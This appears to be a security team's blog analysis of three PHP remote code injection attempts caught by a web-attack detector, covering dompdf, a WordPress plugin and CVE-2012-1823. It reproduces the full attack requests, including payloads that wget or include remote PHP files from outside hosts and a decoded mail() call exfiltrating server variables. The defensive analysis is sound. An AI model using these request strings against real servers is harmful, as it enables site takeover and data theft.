A Few PHP Code Injection Attacks

Recently, I have been testing a web-attack detector using HTTP traffic coming to our public web server.  During a 2-week period, the detector was able to identify a few attack attempts, primarily remote code injection that targets PHP vulnerabilities.  I did some analysis and would like to share what I found.

Remote code injection I (dompdf)

Source IP: 82.98.144.53

IP location: Spain, Galicia, A Coruna

Request: GET //dompdf/dompdf.php?input_file=hxxp://board.kcm.co.kr///skin/zero_vote/images/t.gif??

This is, to be more specific, a file inclusion exploit aimed at dompdf.php (http://www.cvedetails.com/cve/CVE-2010-4879/), a HTML to PDF convertor application, version 0.6.0. The .gif is a PHP file in disguise (screenshot below).

The first couple of lines are gzinflate base64 encoded. They are decoded as:

mail(“exampIe@email.com”,”attach from “.$_SERVER["REMOTE_ADDR"].” on “.$_SERVER["SERVER_NAME"],”ENV: “.print_r($_ENV,1).”\nSERVER: “.print_r($_SERVER,1).”\nGET: “.print_r($_GET,1).”\nPOST: “.print_r($_POST,1));

This mail function means to report the victim’s IP along with several environment variables to example@email.com.

Other lines of code are pretty much self-explanatory. If the victim server is not a “PHPBot” yet, the payload file (h**p://www.starhunting.co.kr/log/.log/cmd) will be copied to this victim server and replace the local default.php if this PHP file exists.

What is in the “cmd” file? It is a PHP file and 67K in size. I can only show a snippet here. But feel free to let me know if you want to see the original file. If this file successfully lands on the victim server, congratulations, your web site is owned!

Remote code injection II (wordpress plugin)

Source IP: 78.85.220.66

IP location: Russian Federation, Udmurt, Izhevsk

Request: GET /blog//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL2NyenlsdXh0ZHMuaW4vc2gudHh0OyBtdiBzaC50eHQgaXNfaHVtYW5fY2xhc3MucGhwJyk7));error

This is a shell injection aimed at “ is-human”, a plugin of wordpress (http://www.exploit-db.com/exploits/17299/). The scrambled code is base_64 decoded. The plain text should be:

passthru(‘wget hxxp://crzyluxtds.in/sh.txt; mv sh.txt is_human_class.php’);

Interestingly, the content of ”sh.txt” is very similar to that of “cmd” in the first code injection case. It seems like “all roads lead to Rome” — attackers leverage a variety of vulnerabilities to deliver similar payloads.

Remote code injection III

Source IP: 67.255.227.181/66.0.52.194

IP location: United States, Maine, Old Town/Florida, Gainesville

Request: GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt

This exploit targets a known PHP vulnerability (http://www.cvedetails.com/cve/CVE-2012-1823) which “does not properly handle query strings lacking an ‘=’ character”. The vulnerability affects PHP versions before 5.3.12 and 5.4.x before 5.4.2.

It is worth noting that all three remote code injection attacks are aimed at known PHP vulnerabilities. As of 12/06/2012, they are still circulating in the wild – all payload file links are alive.  Perimeter SOC team has correlations in place to protect our customers. But the first line of defense is always removing vulnerabilities from your servers. Except for the wordpress plugin vulnerability, the other two holes can be patched by updating to the latest versions. If you have the wordpress plugin, we recommend removing it.